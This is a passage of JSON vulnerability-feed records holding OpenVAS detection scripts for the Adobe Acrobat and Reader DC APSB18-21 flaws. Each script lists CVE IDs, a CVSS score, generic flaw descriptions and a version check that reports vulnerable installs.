\"CVE-2018-12794\", \"CVE-2018-5012\", \"CVE-2018-5030\",\n \"CVE-2018-5034\", \"CVE-2018-5037\", \"CVE-2018-5043\", \"CVE-2018-12784\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 13:13:20 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-12 13:11:59 +0530 (Thu, 12 Jul 2018)\");\n script_name(\"Adobe Acrobat Reader DC (Continuous Track) Multiple Vulnerabilities-apsb18-21 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Acrobat Reader\n DC (Continuous Track) and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - A double free error.\n\n - Multiple heap overflow errors.\n\n - Multiple use-after-free errors.\n\n - Multiple out-of-bounds write errors.\n\n - A security bypass error.\n\n - Multiple out-of-bounds read errors.\n\n - Multiple type confusion errors.\n\n - An untrusted pointer dereference error.\n\n - Multiple buffer errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to gain escalated privileges, disclose sensitive information,\n execute arbitrary code on affected system and take control of the affected\n system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat Reader DC (Continuous Track)\n 2018.011.20040 and earlier versions on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat Reader DC Continuous\n version 2018.011.20055 or later.\n For updates refer to Reference links.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-21.html\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_acrobat_reader_dc_cont_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Acrobat/ReaderDC/Continuous/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE );\nvers = infos['version'];\npath = infos['location'];\n\n##2018.011.20055 == 18.011.20055\nif(version_is_less(version:vers, test_version:\"18.011.20055\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"2018.011.20055\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-29T12:34:57", "references": ["https://helpx.adobe.com/security/products/acrobat/apsb18-21.html", "https://helpx.adobe.com"], "pluginID": "1361412562310813660", "description": "This host is installed with Adobe Acrobat Reader\n DC (Continuous Track) and is prone to multiple vulnerabilities.", "edition": 3, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-07-12T00:00:00", "title": "Adobe Acrobat Reader DC (Continuous Track) Multiple Vulnerabilities-apsb18-21 (Windows)", "type": "openvas", "enchantments": {"score": {"modified": "2018-10-29T12:34:57", "vector": "NONE", "value": 7.5}}, "naslFamily": "General", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5025", "CVE-2018-12803", "CVE-2018-12776", "CVE-2018-5011", "CVE-2018-5067", "CVE-2018-12784", "CVE-2018-5061", "CVE-2018-5031", "CVE-2018-5047", "CVE-2018-5020", "CVE-2018-12754", "CVE-2018-5033", "CVE-2018-12757", "CVE-2018-5065", "CVE-2018-5054", "CVE-2018-12802", "CVE-2018-12761", "CVE-2018-5010", "CVE-2018-5036", "CVE-2018-5024", "CVE-2018-5048", "CVE-2018-5018", "CVE-2018-5034", "CVE-2018-5028", "CVE-2018-12779", "CVE-2018-12783", "CVE-2018-5051", "CVE-2018-5052", "CVE-2018-12781", "CVE-2018-5044", "CVE-2018-5014", "CVE-2018-12760", "CVE-2018-12798", "CVE-2018-5043", "CVE-2018-5050", "CVE-2018-5070", "CVE-2018-5058", "CVE-2018-5063", "CVE-2018-5066", "CVE-2018-5042", "CVE-2018-12787", "CVE-2018-5019", "CVE-2018-5046", "CVE-2018-5027", "CVE-2018-5041", "CVE-2018-5068", "CVE-2018-5045", "CVE-2018-12777", "CVE-2018-5069", "CVE-2018-12794", "CVE-2018-5055", "CVE-2018-5021", "CVE-2018-5062", "CVE-2018-12765", "CVE-2018-5009", "CVE-2018-5039", "CVE-2018-12774", "CVE-2018-12790", "CVE-2018-12782", "CVE-2018-12771", "CVE-2018-12793", "CVE-2018-12762", "CVE-2018-12763", "CVE-2018-5035", "CVE-2018-5056", "CVE-2018-5032", "CVE-2018-12780", "CVE-2018-12788", "CVE-2018-5015", "CVE-2018-5017", "CVE-2018-12766", "CVE-2018-5016", "CVE-2018-12785", "CVE-2018-12796", "CVE-2018-12764", "CVE-2018-12770", "CVE-2018-12756", "CVE-2018-12792", "CVE-2018-5030", "CVE-2018-5038", "CVE-2018-12797", "CVE-2018-5026", "CVE-2018-5023", "CVE-2018-5049", "CVE-2018-12768", "CVE-2018-5040", "CVE-2018-12755", "CVE-2018-5029", "CVE-2018-12789", "CVE-2018-5057", "CVE-2018-12767", "CVE-2018-12791", "CVE-2018-5064", "CVE-2018-5012", "CVE-2018-5022", "CVE-2018-12758", "CVE-2018-12773", "CVE-2018-5060", "CVE-2018-12786", "CVE-2018-12772", "CVE-2018-5059", "CVE-2018-12795", "CVE-2018-5037", "CVE-2018-5053"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310813660", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813660", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_acrobat_reader_dc_cont_apsb18-21_win.nasl 12120 2018-10-26 11:13:20Z mmartin $\n#\n# Adobe Acrobat Reader DC (Continuous Track) Multiple Vulnerabilities-apsb18-21 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader_dc_continuous\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813660\");\n script_version(\"$Revision: 12120 $\");\n script_cve_id(\"CVE-2018-12782\", \"CVE-2018-5015\", \"CVE-2018-5028\", \"CVE-2018-5032\",\n \"CVE-2018-5036\", \"CVE-2018-5038\", \"CVE-2018-5040\", \"CVE-2018-5041\",\n \"CVE-2018-5045\", \"CVE-2018-5052\", \"CVE-2018-5058\", \"CVE-2018-5067\",\n \"CVE-2018-12785\", \"CVE-2018-12788\", \"CVE-2018-12798\", \"CVE-2018-5009\",\n \"CVE-2018-5011\", \"CVE-2018-5065\", \"CVE-2018-12756\", \"CVE-2018-12770\",\n \"CVE-2018-12772\", \"CVE-2018-12773\", \"CVE-2018-12776\", \"CVE-2018-12783\",\n \"CVE-2018-12791\", \"CVE-2018-12792\", \"CVE-2018-12796\", \"CVE-2018-12797\",\n \"CVE-2018-5020\", \"CVE-2018-5021\", \"CVE-2018-5042\", \"CVE-2018-5059\",\n \"CVE-2018-5064\", \"CVE-2018-5069\", \"CVE-2018-5070\", \"CVE-2018-12754\",\n \"CVE-2018-12755\", \"CVE-2018-12758\", \"CVE-2018-12760\", \"CVE-2018-12771\",\n \"CVE-2018-12787\", \"CVE-2018-12802\", \"CVE-2018-5010\", \"CVE-2018-12803\",\n \"CVE-2018-5014\", \"CVE-2018-5016\", \"CVE-2018-5017\", \"CVE-2018-5018\",\n \"CVE-2018-5019\", \"CVE-2018-5022\", \"CVE-2018-5023\", \"CVE-2018-5024\",\n \"CVE-2018-5025\", \"CVE-2018-5026\", \"CVE-2018-5027\", \"CVE-2018-5029\",\n \"CVE-2018-5031\", \"CVE-2018-5033\", \"CVE-2018-5035\", \"CVE-2018-5039\",\n \"CVE-2018-5044\", \"CVE-2018-5046\", \"CVE-2018-5047\", \"CVE-2018-5048\",\n \"CVE-2018-5049\", \"CVE-2018-5050\", \"CVE-2018-5051\", \"CVE-2018-5053\",\n \"CVE-2018-5054\", \"CVE-2018-5055\", \"CVE-2018-5056\", \"CVE-2018-5060\",\n \"CVE-2018-5061\", \"CVE-2018-5062\", \"CVE-2018-5063\", \"CVE-2018-5066\",\n \"CVE-2018-5068\", \"CVE-2018-12757\", \"CVE-2018-12761\", \"CVE-2018-12762\",\n \"CVE-2018-12763\", \"CVE-2018-12764\", \"CVE-2018-12765\", \"CVE-2018-12766\",\n \"CVE-2018-12767\", \"CVE-2018-12768\", \"CVE-2018-12774\", \"CVE-2018-12777\",\n \"CVE-2018-12779\", \"CVE-2018-12780\", \"CVE-2018-12781\", \"CVE-2018-12786\",\n \"CVE-2018-12789\", \"CVE-2018-12790\", \"CVE-2018-12795\", \"CVE-2018-5057\",\n \"CVE-2018-12793\", \"CVE-2018-12794\", \"CVE-2018-5012\", \"CVE-2018-5030\",\n \"CVE-2018-5034\", \"CVE-2018-5037\", \"CVE-2018-5043\", \"CVE-2018-12784\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 13:13:20 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-12 13:11:59 +0530 (Thu, 12 Jul 2018)\");\n script_name(\"Adobe Acrobat Reader DC (Continuous Track) Multiple Vulnerabilities-apsb18-21 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Acrobat Reader\n DC (Continuous Track) and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - A double free error.\n\n - Multiple heap overflow errors.\n\n - Multiple use-after-free errors.\n\n - Multiple out-of-bounds write errors.\n\n - A security bypass error.\n\n - Multiple out-of-bounds read errors.\n\n - Multiple type confusion errors.\n\n - An untrusted pointer dereference error.\n\n - MUltiple buffer errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to gain escalated privileges, disclose sensitive information,\n execute arbitrary code on affected system and take control of the affected\n system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat Reader DC (Continuous Track)\n 2018.011.20040 and earlier versions on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat Reader DC Continuous\n version 2018.011.20055 or later.\n For updates refer to Reference links.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-21.html\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_acrobat_reader_dc_cont_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Acrobat/ReaderDC/Continuous/Win/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE );\nvers = infos['version'];\npath = infos['location'];\n\n##2018.011.20055 == 18.011.20055\nif(version_is_less(version:vers, test_version:\"18.011.20055\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"2018.011.20055\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-26T14:35:20", "references": ["https://helpx.adobe.com/security/products/acrobat/apsb18-21.html", "https://helpx.adobe.com"], "pluginID": "1361412562310813663", "description": "This host is installed with Adobe Acrobat Reader\n DC (Classic Track) and is prone to multiple vulnerabilities.", "edition": 3, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-07-12T00:00:00", "title": "Adobe Acrobat Reader DC (Classic Track) Multiple Vulnerabilities-apsb18-21 (Mac OS X)", "type": "openvas", "enchantments": {"score": {"modified": "2018-10-26T14:35:20", "vector": "NONE", "value": 7.5}}, "naslFamily": "General", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5025", "CVE-2018-12803", "CVE-2018-12776", "CVE-2018-5011", "CVE-2018-5067", "CVE-2018-12784", "CVE-2018-5061", "CVE-2018-5031", "CVE-2018-5047", "CVE-2018-5020", "CVE-2018-12754", "CVE-2018-5033", "CVE-2018-12757", "CVE-2018-5065", "CVE-2018-5054", "CVE-2018-12802", "CVE-2018-12761", "CVE-2018-5010", "CVE-2018-5036", "CVE-2018-5024", "CVE-2018-5048", "CVE-2018-5018", "CVE-2018-5034", "CVE-2018-5028", "CVE-2018-12779", "CVE-2018-12783", "CVE-2018-5051", "CVE-2018-5052", "CVE-2018-12781", "CVE-2018-5044", "CVE-2018-5014", "CVE-2018-12760", "CVE-2018-12798", "CVE-2018-5043", "CVE-2018-5050", "CVE-2018-5070", "CVE-2018-5058", "CVE-2018-5063", "CVE-2018-5066", "CVE-2018-5042", "CVE-2018-12787", "CVE-2018-5019", "CVE-2018-5046", "CVE-2018-5027", "CVE-2018-5041", "CVE-2018-5068", "CVE-2018-5045", "CVE-2018-12777", "CVE-2018-5069", "CVE-2018-12794", "CVE-2018-5055", "CVE-2018-5021", "CVE-2018-5062", "CVE-2018-12765", "CVE-2018-5009", "CVE-2018-5039", "CVE-2018-12774", "CVE-2018-12790", "CVE-2018-12782", "CVE-2018-12771", "CVE-2018-12793", "CVE-2018-12762", "CVE-2018-12763", "CVE-2018-5035", "CVE-2018-5056", "CVE-2018-5032", "CVE-2018-12780", "CVE-2018-12788", "CVE-2018-5015", "CVE-2018-5017", "CVE-2018-12766", "CVE-2018-5016", "CVE-2018-12785", "CVE-2018-12796", "CVE-2018-12764", "CVE-2018-12770", "CVE-2018-12756", "CVE-2018-12792", "CVE-2018-5030", "CVE-2018-5038", "CVE-2018-12797", "CVE-2018-5026", "CVE-2018-5023", "CVE-2018-5049", "CVE-2018-12768", "CVE-2018-5040", "CVE-2018-12755", "CVE-2018-5029", "CVE-2018-12789", "CVE-2018-5057", "CVE-2018-12767", "CVE-2018-12791", "CVE-2018-5064", "CVE-2018-5012", "CVE-2018-5022", "CVE-2018-12758", "CVE-2018-12773", "CVE-2018-5060", "CVE-2018-12786", "CVE-2018-12772", "CVE-2018-5059", "CVE-2018-12795", "CVE-2018-5037", "CVE-2018-5053"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310813663", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813663", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_acrobat_reader_dc_classic_apsb18-21_macosx.nasl 12116 2018-10-26 10:01:35Z mmartin $\n#\n# Adobe Acrobat Reader DC (Classic Track) Multiple Vulnerabilities-apsb18-21 (Mac OS X)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader_dc_classic\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813663\");\n script_version(\"$Revision: 12116 $\");\n script_cve_id(\"CVE-2018-12782\", \"CVE-2018-5015\", \"CVE-2018-5028\", \"CVE-2018-5032\",\n \"CVE-2018-5036\", \"CVE-2018-5038\", \"CVE-2018-5040\", \"CVE-2018-5041\",\n \"CVE-2018-5045\", \"CVE-2018-5052\", \"CVE-2018-5058\", \"CVE-2018-5067\",\n \"CVE-2018-12785\", \"CVE-2018-12788\", \"CVE-2018-12798\", \"CVE-2018-5009\",\n \"CVE-2018-5011\", \"CVE-2018-5065\", \"CVE-2018-12756\", \"CVE-2018-12770\",\n \"CVE-2018-12772\", \"CVE-2018-12773\", \"CVE-2018-12776\", \"CVE-2018-12783\",\n \"CVE-2018-12791\", \"CVE-2018-12792\", \"CVE-2018-12796\", \"CVE-2018-12797\",\n \"CVE-2018-5020\", \"CVE-2018-5021\", \"CVE-2018-5042\", \"CVE-2018-5059\",\n \"CVE-2018-5064\", \"CVE-2018-5069\", \"CVE-2018-5070\", \"CVE-2018-12754\",\n \"CVE-2018-12755\", \"CVE-2018-12758\", \"CVE-2018-12760\", \"CVE-2018-12771\",\n \"CVE-2018-12787\", \"CVE-2018-12802\", \"CVE-2018-5010\", \"CVE-2018-12803\",\n \"CVE-2018-5014\", \"CVE-2018-5016\", \"CVE-2018-5017\", \"CVE-2018-5018\",\n \"CVE-2018-5019\", \"CVE-2018-5022\", \"CVE-2018-5023\", \"CVE-2018-5024\",\n \"CVE-2018-5025\", \"CVE-2018-5026\", \"CVE-2018-5027\", \"CVE-2018-5029\",\n \"CVE-2018-5031\", \"CVE-2018-5033\", \"CVE-2018-5035\", \"CVE-2018-5039\",\n \"CVE-2018-5044\", \"CVE-2018-5046\", \"CVE-2018-5047\", \"CVE-2018-5048\",\n \"CVE-2018-5049\", \"CVE-2018-5050\", \"CVE-2018-5051\", \"CVE-2018-5053\",\n \"CVE-2018-5054\", \"CVE-2018-5055\", \"CVE-2018-5056\", \"CVE-2018-5060\",\n \"CVE-2018-5061\", \"CVE-2018-5062\", \"CVE-2018-5063\", \"CVE-2018-5066\",\n \"CVE-2018-5068\", \"CVE-2018-12757\", \"CVE-2018-12761\", \"CVE-2018-12762\",\n \"CVE-2018-12763\", \"CVE-2018-12764\", \"CVE-2018-12765\", \"CVE-2018-12766\",\n \"CVE-2018-12767\", \"CVE-2018-12768\", \"CVE-2018-12774\", \"CVE-2018-12777\",\n \"CVE-2018-12779\", \"CVE-2018-12780\", \"CVE-2018-12781\", \"CVE-2018-12786\",\n \"CVE-2018-12789\", \"CVE-2018-12790\", \"CVE-2018-12795\", \"CVE-2018-5057\",\n \"CVE-2018-12793\", \"CVE-2018-12794\", \"CVE-2018-5012\", \"CVE-2018-5030\",\n \"CVE-2018-5034\", \"CVE-2018-5037\", \"CVE-2018-5043\", \"CVE-2018-12784\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 12:01:35 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-12 13:11:59 +0530 (Thu, 12 Jul 2018)\");\n script_name(\"Adobe Acrobat Reader DC (Classic Track) Multiple Vulnerabilities-apsb18-21 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Acrobat Reader\n DC (Classic Track) and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - A double free error.\n\n - Multiple heap overflow errors.\n\n - Multiple use-after-free errors.\n\n - Multiple out-of-bounds write errors.\n\n - A security bypass error.\n\n - Multiple out-of-bounds read errors.\n\n - Multiple type confusion errors.\n\n - An untrusted pointer dereference error.\n\n - MUltiple buffer errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to gain escalated privileges, disclose sensitive information,\n execute arbitrary code on affected system and take control of the affected\n system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat Reader DC (Classic Track)\n 2015.006.30418 and earlier versions on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat Reader DC (Classic Track)\n version 2015.006.30434 or later.\n For updates refer to Reference links.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-21.html\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_acrobat_reader_dc_classic_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Acrobat/ReaderDC/Classic/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE );\nvers = infos['version'];\npath = infos['location'];\n\n##2015.006.30434 == 15.006.30434\nif(version_is_less(version:vers, test_version:\"15.006.30434\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"2015.006.30434\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-26T14:35:21", "references": ["https://helpx.adobe.com/security/products/acrobat/apsb18-21.html", "https://helpx.adobe.com"], "pluginID": "1361412562310813670", "description": "This host is installed with Adobe Acrobat 2017\n and is prone to multiple vulnerabilities.", "edition": 3, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-07-12T00:00:00", "title": "Adobe Acrobat 2017 Multiple Vulnerabilities-apsb18-21 (Mac OS X)", "type": "openvas", "enchantments": {"score": {"modified": "2018-10-26T14:35:21", "vector": "NONE", "value": 7.5}}, "naslFamily": "General", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5025", "CVE-2018-12803", "CVE-2018-12776", "CVE-2018-5011", "CVE-2018-5067", "CVE-2018-12784", "CVE-2018-5061", "CVE-2018-5031", "CVE-2018-5047", "CVE-2018-5020", "CVE-2018-12754", "CVE-2018-5033", "CVE-2018-12757", "CVE-2018-5065", "CVE-2018-5054", "CVE-2018-12802", "CVE-2018-12761", "CVE-2018-5010", "CVE-2018-5036", "CVE-2018-5024", "CVE-2018-5048", "CVE-2018-5018", "CVE-2018-5034", "CVE-2018-5028", "CVE-2018-12779", "CVE-2018-12783", "CVE-2018-5051", "CVE-2018-5052", "CVE-2018-12781", "CVE-2018-5044", "CVE-2018-5014", "CVE-2018-12760", "CVE-2018-12798", "CVE-2018-5043", "CVE-2018-5050", "CVE-2018-5070", "CVE-2018-5058", "CVE-2018-5063", "CVE-2018-5066", "CVE-2018-5042", "CVE-2018-12787", "CVE-2018-5019", "CVE-2018-5046", "CVE-2018-5027", "CVE-2018-5041", "CVE-2018-5068", "CVE-2018-5045", "CVE-2018-12777", "CVE-2018-5069", "CVE-2018-12794", "CVE-2018-5055", "CVE-2018-5021", "CVE-2018-5062", "CVE-2018-12765", "CVE-2018-5009", "CVE-2018-5039", "CVE-2018-12774", "CVE-2018-12790", "CVE-2018-12782", "CVE-2018-12771", "CVE-2018-12793", "CVE-2018-12762", "CVE-2018-12763", "CVE-2018-5035", "CVE-2018-5056", "CVE-2018-5032", "CVE-2018-12780", "CVE-2018-12788", "CVE-2018-5015", "CVE-2018-5017", "CVE-2018-12766", "CVE-2018-5016", "CVE-2018-12785", "CVE-2018-12796", "CVE-2018-12764", "CVE-2018-12770", "CVE-2018-12756", "CVE-2018-12792", "CVE-2018-5030", "CVE-2018-5038", "CVE-2018-12797", "CVE-2018-5026", "CVE-2018-5023", "CVE-2018-5049", "CVE-2018-12768", "CVE-2018-5040", "CVE-2018-12755", "CVE-2018-5029", "CVE-2018-12789", "CVE-2018-5057", "CVE-2018-12767", "CVE-2018-12791", "CVE-2018-5064", "CVE-2018-5012", "CVE-2018-5022", "CVE-2018-12758", "CVE-2018-12773", "CVE-2018-5060", "CVE-2018-12786", "CVE-2018-12772", "CVE-2018-5059", "CVE-2018-12795", "CVE-2018-5037", "CVE-2018-5053"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310813670", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813670", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_acrobat_2017_apsb18-21_macosx.nasl 12116 2018-10-26 10:01:35Z mmartin $\n#\n# Adobe Acrobat 2017 Multiple Vulnerabilities-apsb18-21 (Mac OS X)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813670\");\n script_version(\"$Revision: 12116 $\");\n script_cve_id(\"CVE-2018-12782\", \"CVE-2018-5015\", \"CVE-2018-5028\", \"CVE-2018-5032\",\n \"CVE-2018-5036\", \"CVE-2018-5038\", \"CVE-2018-5040\", \"CVE-2018-5041\",\n \"CVE-2018-5045\", \"CVE-2018-5052\", \"CVE-2018-5058\", \"CVE-2018-5067\",\n \"CVE-2018-12785\", \"CVE-2018-12788\", \"CVE-2018-12798\", \"CVE-2018-5009\",\n \"CVE-2018-5011\", \"CVE-2018-5065\", \"CVE-2018-12756\", \"CVE-2018-12770\",\n \"CVE-2018-12772\", \"CVE-2018-12773\", \"CVE-2018-12776\", \"CVE-2018-12783\",\n \"CVE-2018-12791\", \"CVE-2018-12792\", \"CVE-2018-12796\", \"CVE-2018-12797\",\n \"CVE-2018-5020\", \"CVE-2018-5021\", \"CVE-2018-5042\", \"CVE-2018-5059\",\n \"CVE-2018-5064\", \"CVE-2018-5069\", \"CVE-2018-5070\", \"CVE-2018-12754\",\n \"CVE-2018-12755\", \"CVE-2018-12758\", \"CVE-2018-12760\", \"CVE-2018-12771\",\n \"CVE-2018-12787\", \"CVE-2018-12802\", \"CVE-2018-5010\", \"CVE-2018-12803\",\n \"CVE-2018-5014\", \"CVE-2018-5016\", \"CVE-2018-5017\", \"CVE-2018-5018\",\n \"CVE-2018-5019\", \"CVE-2018-5022\", \"CVE-2018-5023\", \"CVE-2018-5024\",\n \"CVE-2018-5025\", \"CVE-2018-5026\", \"CVE-2018-5027\", \"CVE-2018-5029\",\n \"CVE-2018-5031\", \"CVE-2018-5033\", \"CVE-2018-5035\", \"CVE-2018-5039\",\n \"CVE-2018-5044\", \"CVE-2018-5046\", \"CVE-2018-5047\", \"CVE-2018-5048\",\n \"CVE-2018-5049\", \"CVE-2018-5050\", \"CVE-2018-5051\", \"CVE-2018-5053\",\n \"CVE-2018-5054\", \"CVE-2018-5055\", \"CVE-2018-5056\", \"CVE-2018-5060\",\n \"CVE-2018-5061\", \"CVE-2018-5062\", \"CVE-2018-5063\", \"CVE-2018-5066\",\n \"CVE-2018-5068\", \"CVE-2018-12757\", \"CVE-2018-12761\", \"CVE-2018-12762\",\n \"CVE-2018-12763\", \"CVE-2018-12764\", \"CVE-2018-12765\", \"CVE-2018-12766\",\n \"CVE-2018-12767\", \"CVE-2018-12768\", \"CVE-2018-12774\", \"CVE-2018-12777\",\n \"CVE-2018-12779\", \"CVE-2018-12780\", \"CVE-2018-12781\", \"CVE-2018-12786\",\n \"CVE-2018-12789\", \"CVE-2018-12790\", \"CVE-2018-12795\", \"CVE-2018-5057\",\n \"CVE-2018-12793\", \"CVE-2018-12794\", \"CVE-2018-5012\", \"CVE-2018-5030\",\n \"CVE-2018-5034\", \"CVE-2018-5037\", \"CVE-2018-5043\", \"CVE-2018-12784\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 12:01:35 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-12 13:11:59 +0530 (Thu, 